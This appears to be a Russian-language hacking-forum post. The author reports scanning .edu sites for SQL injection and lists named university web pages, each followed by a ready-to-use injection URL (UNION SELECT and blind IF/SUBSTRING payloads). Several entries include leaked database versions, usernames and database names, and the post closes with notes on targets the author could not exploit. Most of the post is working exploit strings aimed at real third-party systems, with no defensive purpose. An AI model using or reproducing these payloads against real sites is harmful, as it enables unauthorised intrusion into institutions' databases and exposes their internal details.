Помучал гугль на
edu сервера, вывод:
Каждая пятая ссылка уязвима к SQL injection
Из этих ссылок на каждой второй легко провести SQL injection
bti.cornell.edu
Код:
http://bti.cornell.edu/page.php?id=111' OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*
3 версия мускуля
gmu.edu
Код:
http://gmu.edu/cfa/calendar/eventlisting.php?id=-598' UNION SELECT 1,2,3,CONCAT_WS(':',VERSION(),USER(),DATABASE()),5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.0.24_Debian-10sarge2-log
ublic@jiju.gmu.edu:centerarts
www.bact.wisc.edu
Код:
http://www.bact.wisc.edu/GradStudies/facultyListing.php?id=-25 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11/*
4.1.22-log : viewTables@localhost : bactsite
wwwrsphysse.anu.edu.au (сразу на заметил что не edu сервер... и как раз пятая версия мускула
)
Код:
http://wwwrsphysse.anu.edu.au/nuclear/personnel.php?id=-50 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),8,9,10,11,12,13,14,15,16,17,18
5.0.22 : nucleus_reader@rsphyweb.anu.edu.au : nucleus
www.ns.umich.edu
Код:
http://www.ns.umich.edu/htdocs/releases/story.php?id=3125'
Тут UPDATE
genealogy.math.ndsu.nodak.edu
Код:
http://genealogy.math.ndsu.nodak.edu/id.php?id=18231'
Не разобралсо
www.salk.edu
Код:
http://www.salk.edu/faculty/faculty_details.php?id=-15'
Вроде чето есть, не разобралсо
qt.exploratorium.edu
Код:
http://qt.exploratorium.edu/cils/page.php?ID=15 UNION SELECT 1,2,3,4 /*
У меня вывести ничего не получилось...
stanfordphotonics.stanford.edu
Код:
http://stanfordphotonics.stanford.edu/calendar.event.php?id=53'
При подборе столбцов с помощью GROUP BY 3 столбца а на UNION SELECT 1,2,3 выдает ошибку...
-----------------------------------------------
Зы нашел в два раза больше чем тут, но половина оказалась баяном